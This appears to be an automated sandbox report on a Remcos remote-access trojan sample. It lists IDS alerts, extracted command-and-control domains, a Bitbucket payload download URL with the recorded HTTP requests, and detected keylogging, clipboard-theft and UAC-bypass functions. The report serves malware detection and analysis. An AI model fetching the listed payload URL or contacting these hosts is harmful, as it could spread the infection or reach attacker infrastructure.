Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49991 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49992 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49848 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49997 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49952 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49995 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49977 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49996 -> 192.169.69.26:2500
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49999 -> 192.169.69.26:2404
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49925 -> 192.169.69.26:2500

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://bitbucket.org/ntim1478/gpmaw/downloads/250_Vjrsafyhidj
Source: Malware configuration extractor	URLs: idearo24.duckdns.org
Source: Malware configuration extractor	URLs: morewins.duckdns.org

Uses dynamic DNS services

Source: unknown	DNS query: name: morewins.duckdns.org
Source: unknown	DNS query: name: idearo24.duckdns.org

Contains functionality to check if a connection to the internet is available

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029DE4B8 InternetCheckConnectionA,

0_2_029DE4B8

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.166.143.49 185.166.143.49
Source: Joe Sandbox View	IP Address: 192.169.69.26 192.169.69.26
Source: Joe Sandbox View	IP Address: 192.169.69.26 192.169.69.26

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WOWUS WOWUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 185.166.143.49:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 3.5.29.78:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /ntim1478/gpmaw/downloads/250_Vjrsafyhidj HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/0d838bb6-e11a-4581-89b6-9d1c81b740c6/250_Vjrsafyhidj?response-content-disposition=attachment%3B%20filename%3D%22250_Vjrsafyhidj%22&AWSAccessKeyId=ASIA6KOSE3BNJVZFSC5J&Signature=X9FPDBgOKbMRRHwdgtMpXClEkas%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEID%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDBsGro9ewLlxm1Jmlfi5RtGFKUidgU0v40nryUex%2FcIgIgI%2BrBcW%2F3yv43XRHYbOxWMP4rmh1qdoHeaiYCvGtj%2BUAqpwIIKBAAGgw5ODQ1MjUxMDExNDYiDKhoBvZz8dz3MdHLcyqEAqNX5Lbiey9VA4Nu2PKLpWe7AzQs30CYCQ17ojsFQBzWb9jeoj1R2lBiZuhmaGwyKFMZacVqoVxGu%2FNGxYiE5WD0T5%2FhYQC8Yx%2BpuwlCMYrdpZyr8LRd1Dspqx%2BDUimzDabcJHysCSHaxuL9Vias0chfJAV6mJYRKWIHNuFasT2CBnFQ1EmYqd%2FFNkaneV9mppb%2BaZ1xRVY6%2Bqv%2BcxJDSZrxDbYwJyM91nLC6Db5%2BAE7H9gjoWPlzs1RzlbZ9U6oQcsRra5iAMM5bKNk1DlWdmHiq0awQP3afEwfLFft8xhJw6j3%2Fs2HWvKLkfxj3x89YGzjHxLi0UqjQ3ffKLCPlhujaT27MMHplboGOp0BD9q41D6kLh9F0nVQM4xyf7fNq9CF0Ik0oCST0SE%2FeyLSoPqdarJpvPrLFVvqTmHs9Xrrnsn0b%2FWvuVqJdzvwFoysrGnC2guwi1wRx%2BRKdh6HIIzmhk1zI5aGT2YQWpP6qaOwQTzLKadxNdAhW0xo3LTCGGxx3cNyux56ve0aK891sK6sUoIojqjLnr9e3jrEAHd%2FC8rvFymkN3%2BxUg%3D%3D&Expires=1732606921 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027C4B96 WaitForSingleObject,SetEvent,recv,

8_2_027C4B96

Source: global traffic	HTTP traffic detected: GET /ntim1478/gpmaw/downloads/250_Vjrsafyhidj HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/0d838bb6-e11a-4581-89b6-9d1c81b740c6/250_Vjrsafyhidj?response-content-disposition=attachment%3B%20filename%3D%22250_Vjrsafyhidj%22&AWSAccessKeyId=ASIA6KOSE3BNJVZFSC5J&Signature=X9FPDBgOKbMRRHwdgtMpXClEkas%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEID%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDBsGro9ewLlxm1Jmlfi5RtGFKUidgU0v40nryUex%2FcIgIgI%2BrBcW%2F3yv43XRHYbOxWMP4rmh1qdoHeaiYCvGtj%2BUAqpwIIKBAAGgw5ODQ1MjUxMDExNDYiDKhoBvZz8dz3MdHLcyqEAqNX5Lbiey9VA4Nu2PKLpWe7AzQs30CYCQ17ojsFQBzWb9jeoj1R2lBiZuhmaGwyKFMZacVqoVxGu%2FNGxYiE5WD0T5%2FhYQC8Yx%2BpuwlCMYrdpZyr8LRd1Dspqx%2BDUimzDabcJHysCSHaxuL9Vias0chfJAV6mJYRKWIHNuFasT2CBnFQ1EmYqd%2FFNkaneV9mppb%2BaZ1xRVY6%2Bqv%2BcxJDSZrxDbYwJyM91nLC6Db5%2BAE7H9gjoWPlzs1RzlbZ9U6oQcsRra5iAMM5bKNk1DlWdmHiq0awQP3afEwfLFft8xhJw6j3%2Fs2HWvKLkfxj3x89YGzjHxLi0UqjQ3ffKLCPlhujaT27MMHplboGOp0BD9q41D6kLh9F0nVQM4xyf7fNq9CF0Ik0oCST0SE%2FeyLSoPqdarJpvPrLFVvqTmHs9Xrrnsn0b%2FWvuVqJdzvwFoysrGnC2guwi1wRx%2BRKdh6HIIzmhk1zI5aGT2YQWpP6qaOwQTzLKadxNdAhW0xo3LTCGGxx3cNyux56ve0aK891sK6sUoIojqjLnr9e3jrEAHd%2FC8rvFymkN3%2BxUg%3D%3D&Expires=1732606921 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com

Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: idearo24.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: morewins.duckdns.org

Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: colorcpl.exe, SndVol.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: D2pQ4J4GGZ.exe, D2pQ4J4GGZ.exe, 00000000.00000002.2175474410.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2149724742.00000000024CA000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FB1F000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2032127390.00000000024C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pmail.com
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2130559625.00000000007E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/0d838bb6-e11a-
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/g9g
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/0d838bb6-e
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.000000000076D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.00000000207AD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/dow
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020717000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.000000000071E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/downloads/250_Vjrsafyhidj
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.000000000071E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/downloads/250_Vjrsafyhidjp
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.29.78:443 -> 192.168.2.5:49706 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027CA2F3 SetWindowsHookExA 0000000D,027CA2DF,00000000

8_2_027CA2F3

Contains functionality for read data from the clipboard

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027CB749 OpenClipboard,GetClipboardData,CloseClipboard,

8_2_027CB749

Contains functionality to modify clipboard data

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027D68FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	8_2_027D68FC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027D68FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	11_2_027D68FC
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	13_2_028168FC

Contains functionality to read the clipboard data

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027CB749 OpenClipboard,GetClipboardData,CloseClipboard,

8_2_027CB749

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027CA41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

8_2_027CA41B

Yara detected Keylogger Generic

Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2349013309.000000001B1D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2240779632.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491250282.0000000000528000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027DCA73 SystemParametersInfoW,	8_2_027DCA73
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027DCA73 SystemParametersInfoW,	11_2_027DCA73
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0281CA73 SystemParametersInfoW,	13_2_0281CA73

System Summary

Malicious sample detected (through community Yara rule)

Source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
